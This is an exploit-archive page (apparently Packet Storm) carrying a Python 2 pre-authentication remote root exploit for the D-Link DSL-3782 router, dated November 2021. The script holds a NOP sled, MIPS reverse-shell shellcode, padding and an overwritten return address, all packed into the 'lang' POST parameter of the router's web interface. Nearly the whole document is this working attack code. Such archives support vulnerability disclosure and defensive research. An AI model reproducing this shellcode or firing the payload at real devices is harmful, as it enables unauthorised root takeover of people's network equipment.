what you don't know can hurt you

D-Link DSL-3782 Pre-Authentication Remote Root

D-Link DSL-3782 Pre-Authentication Remote Root
Posted Nov 27, 2021
Authored by Cody Sixteen

D-Link DSL-3782 pre-authentication remote root exploit.

tags | exploit, remote, root
MD5 | a6737ad9475fdc7acd7e5df474362dd1

D-Link DSL-3782 Pre-Authentication Remote Root

Change Mirror Download
#!/usr/bin/python2
# preauth rece for dlink dsl-3782
# found: 06.11.2021
# pwned: 18.112021 @ 19:26
#


import sys
import urllib2 # requests
import urllib
import struct

target = 'http://192.168.0.50/index.php' # cgi-bin/ChgLang.asp'




nopsled = ""
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
for i in range(74):
nopsled += "\x41\x41\x41\x41" # 26\x40\x08\x01"


#print("nopsled len: %s" % len(nopsled))
#print(len(nopsled))


# shellcode; revshell: 272-232=?:
buf = b""
buf += b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01"
buf += b"\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01"
buf += b"\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70"
buf += b"\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68\x04"
buf += b"\x24\x0e\x27\x0f\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf"
buf += b"\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10"
buf += b"\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff"
buf += b"\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25"
buf += b"\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02"
buf += b"\x10\x20\x25\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02"
buf += b"\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24\x11\xff"
buf += b"\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21"
buf += b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22"
buf += b"\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f"
buf += b"\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
buf += b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4"
buf += b"\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27"
buf += b"\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c"


shellcode = buf


#shellcode = ( "D" * 276 )





ret = struct.pack(">I", 0x7fff45b0) # ;] 0x7fff4528) # 0x2abccbb0) # system(); 0x2b269fcc) # SELECT... x2accefcc) # 0x123456) # 0x42424242)
junk = "A" * 68 # 136 # 264 # (596 - len(shellcode) - len(ret)) # - len(nopsled))




###############
#payload = junk + shellcode + ret
payload = nopsled + shellcode + junk + ret

#print(len(payload))
print(payload)

data = urllib.urlencode({'lang' : payload })

sendme = urllib2.Request(target, data ) # url=target, data=post_me)

#print(sendme)

#print "DONE"













Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close